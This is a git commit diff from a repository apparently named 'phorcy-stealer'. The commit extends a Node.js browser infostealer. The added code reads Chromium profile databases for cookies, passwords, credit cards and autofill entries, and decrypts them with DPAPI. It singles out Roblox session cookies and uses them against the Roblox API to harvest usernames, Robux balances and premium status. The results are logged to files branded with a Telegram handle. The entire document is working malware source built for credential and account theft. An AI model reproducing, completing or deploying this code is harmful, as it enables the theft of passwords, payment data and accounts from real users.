whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'main' of https://github.com/phorcyuhh/phorcy

Browse Source
This commit is contained in:
eline
2023-11-26 03:18:57 +01:00
parent ac2276472c 2eee498ab8
commit 5bde40fb37
1 changed files with 112 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

118
Utils/browser.js → Utils/browser-stealer.js
View File

@@ -3,6 +3,7 @@ const sqlite3 = require('sqlite3').verbose();
const crypto = require('crypto') const crypto = require('crypto')
const path = require('path') const path = require('path')
const dpapi = require('./node-dpapi'); const dpapi = require('./node-dpapi');
const axios = require('axios');
class BrowserStealing { class BrowserStealing {
constructor() { constructor() {
@@ -62,11 +63,12 @@ class BrowserStealing {
this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5']; this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'];
this.tempDir = path.join(this.local, 'Temp'); this.tempDir = path.join(this.local, 'Temp');
this.password_command = 'SELECT action_url, username_value, password_value FROM logins'; this.password_command = 'SELECT action_url, username_value, password_value FROM logins;';
this.cookie_command = 'SELECT host_key, name, encrypted_value, expires_utc FROM cookies'; this.cookie_command = 'SELECT host_key, name, encrypted_value, expires_utc FROM cookies;';
this.cc_command = 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards'; this.cc_command = 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards;';
this.history_command = 'SELECT url, title, last_visit_time FROM urls'; this.history_command = 'SELECT url, title, last_visit_time FROM urls;';
this.downloads_command = 'SELECT tab_url, target_path FROM downloads'; this.downloads_command = 'SELECT tab_url, target_path FROM downloads;';
this.autofill_command = 'SELECT * FROM autofill;';
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt'); this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt');
this.cookieFile = path.join(this.phorcyDir, 'browser_cookies.txt'); this.cookieFile = path.join(this.phorcyDir, 'browser_cookies.txt');
@@ -74,6 +76,8 @@ class BrowserStealing {
this.historyFile = path.join(this.phorcyDir, 'browser_history.txt'); this.historyFile = path.join(this.phorcyDir, 'browser_history.txt');
this.downloadsFile = path.join(this.phorcyDir, 'browser_downloads.txt'); this.downloadsFile = path.join(this.phorcyDir, 'browser_downloads.txt');
this.bookmarkFile = path.join(this.phorcyDir, 'browser_bookmarks.txt'); this.bookmarkFile = path.join(this.phorcyDir, 'browser_bookmarks.txt');
this.autofillFile = path.join(this.phorcyDir, 'browser_autofill.txt');
this.robloxFile = path.join(this.phorcyDir, 'roblox_cookies.txt');
this.password_count = 0; this.password_count = 0;
this.cookie_count = 0; this.cookie_count = 0;
@@ -81,6 +85,8 @@ class BrowserStealing {
this.history_count = 0; this.history_count = 0;
this.downloads_count = 0; this.downloads_count = 0;
this.bookmark_count = 0; this.bookmark_count = 0;
this.autofill_count = 0;
this.roblox_count = 0;
} }
generateRandomString() { generateRandomString() {
@@ -207,6 +213,26 @@ class BrowserStealing {
try { try {
const cookieList = `+------------------------+\n| Host: ${row["host_key"]} |\n| Name: ${row.name ? row.name.toString() : ''} |\n| Cookie value: ${decrypted} |\n| Expiration: ${row['expires_utc']} |\n`; const cookieList = `+------------------------+\n| Host: ${row["host_key"]} |\n| Name: ${row.name ? row.name.toString() : ''} |\n| Cookie value: ${decrypted} |\n| Expiration: ${row['expires_utc']} |\n`;
fs.writeFileSync(this.cookieFile, cookieList, { flag: 'a' }); fs.writeFileSync(this.cookieFile, cookieList, { flag: 'a' });
if ('.ROBLOSECURITY' === row.name.toString()) {
this.roblox_count++;
const robloSecurityo = decrypted
//console.log(robloSecurityo);
let headers = {
'cookie': `.ROBLOSECURITY=${robloSecurityo};`,
}
axios.get("https://www.roblox.com/mobileapi/userinfo", { headers })
.then(response => {
//console.log(response.data);
if (response.data) {
let robloxData = `+------------------------+\n| Username: ${response.data['username']} |\n| User ID: ${response.data['userid']} |\n| Robux Balance: ${response.data['robuxbalance']} |\n| Is Premium? ${response.data['ispremium']} |\n| Cookie: ${robloSecurityo} |\n`;
fs.writeFileSync(this.robloxFile, robloxData, { flag: 'a' });
}
})
.catch(err => {
console.error(err);
});
}
} catch (err) { } catch (err) {
console.error(err); console.error(err);
} }
@@ -218,7 +244,8 @@ class BrowserStealing {
console.error(err); console.error(err);
} }
}); });
console.log('Cookie count:', this.cookie_count) console.log('Cookie count:', this.cookie_count);
console.log('Roblox count:', this.roblox_count);
}); });
}); });
}); });
@@ -433,6 +460,58 @@ class BrowserStealing {
} }
}; };
getAutofill(autofillFile, masterKey) {
const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`);
fs.copyFile(autofillFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.autofill_command, (err, rows) => {
if (err) {
console.error(err);
} else {
rows.map(row => {
//console.log(row);
if (row) {
this.autofill_count++;
try {
const autofillList = `+------------------------+\n| Name: ${row['name']} |\n| Value: ${row['value']} |\n| Value_Lower: ${row['value_lower']} |\n| Date Created: ${row['date_created']} |\n| Date Last Used: ${row['date_last_used']} |\n| Count: ${row['count']} |\n`;
fs.writeFileSync(this.autofillFile, autofillList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Autofill count:', this.autofill_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async Main() { async Main() {
// dir preparation // dir preparation
if (!this.fileExists(this.phorcyDir)) { if (!this.fileExists(this.phorcyDir)) {
@@ -470,6 +549,7 @@ class BrowserStealing {
} }
// cookie grabber // cookie grabber
fs.writeFileSync(this.robloxFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
fs.writeFileSync(this.cookieFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' }); fs.writeFileSync(this.cookieFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) { for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) { if (this.fileExists(browserPath)) {
@@ -571,6 +651,32 @@ class BrowserStealing {
} }
} }
} }
// autofill grabber
fs.writeFileSync(this.autofillFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const autofillFile = path.join(browserPath, profile, 'Web Data');
if (this.fileExists(autofillFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getAutofill(autofillFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
} }
} }